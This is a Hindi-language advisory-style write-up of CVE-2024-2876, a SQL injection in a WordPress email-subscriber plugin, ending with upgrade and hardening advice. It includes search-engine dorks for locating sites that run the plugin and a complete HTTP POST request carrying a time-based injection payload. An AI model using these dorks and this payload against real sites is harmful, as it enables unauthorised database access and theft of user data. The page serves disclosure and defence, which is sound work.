
वर्डप्रेस ईमेल सब्सक्राइबर्स प्लगइन में एक गंभीर SQL इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें शोषण विवरण, HTTP अनुरोध और सर्च डॉर्क्स शामिल हैं।
CVE-2024-2876 वर्डप्रेस के लिए "Email Subscribers by Icegram Express" प्लगइन में पाई गई एक गंभीर सुरक्षा कमजोरी है। यह कमजोरी संस्करण 5.7.14 तक और सहित को प्रभावित करती है और 90,000 से अधिक वेबसाइटों के लिए महत्वपूर्ण जोखिम पैदा करती है।
यह कमजोरी एक SQL इंजेक्शन दोष है जो अप्रमाणित हमलावरों को प्रभावित वर्डप्रेस डेटाबेस पर दुर्भावनापूर्ण SQL क्वेरी निष्पादित करने की अनुमति देती है। उपयोगकर्ता इनपुट में हेरफेर करके जो ठीक से सैनिटाइज़ नहीं किए गए हैं, हमलावर उपयोगकर्ता नाम, ईमेल पते, पासवर्ड हैश और सब्सक्राइबर सूचियों जैसी संवेदनशील जानकारी निकाल सकते हैं।
SQL इंजेक्शन प्लगइन के IG_ES_Subscribers_Query वर्ग के run फ़ंक्शन में होता है, जहाँ अपर्याप्त इनपुट सत्यापन अनधिकृत SQL कोड निष्पादन की ओर ले जाता है। यह वर्डप्रेस डेटाबेस में संग्रहीत डेटा की अखंडता और गोपनीयता से समझौता करता है।
FOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
तत्काल अपडेट: यदि आप "Email Subscribers by Icegram Express" प्लगइन का उपयोग कर रहे हैं, तो सुरक्षा सुधार लागू करने के लिए तुरंत संस्करण 5.7.15 या बाद में अपग्रेड करें।
नियमित ऑडिट: सुरक्षा सुनिश्चित करने के लिए सभी वर्डप्रेस प्लगइन्स और थीम्स को नियमित रूप से उनके नवीनतम संस्करणों में समीक्षा और अपडेट करें।
सुरक्षा प्लगइन्स: SQL इंजेक्शन और अन्य साइबर खतरों के खिलाफ बचाव को बढ़ाने के लिए प्रतिष्ठित वर्डप्रेस सुरक्षा प्लगइन्स का उपयोग करें।
मजबूत पासवर्ड नीतियां: अनधिकृत पहुंच जोखिम को कम करने के लिए अपनी वर्डप्रेस साइट से संबंधित सभी खातों के लिए मजबूत और अद्वितीय पासवर्ड लागू करें।
प्रभावित प्लगइन को अपडेट करने में विफलता वेबसाइटों को डेटा उल्लंघन और अनधिकृत पहुंच के प्रति संवेदनशील छोड़ सकती है। इस प्लगइन के व्यापक उपयोग को देखते हुए, इंस्टॉलेशन को सुरक्षित करने के लिए तत्काल कार्रवाई महत्वपूर्ण है।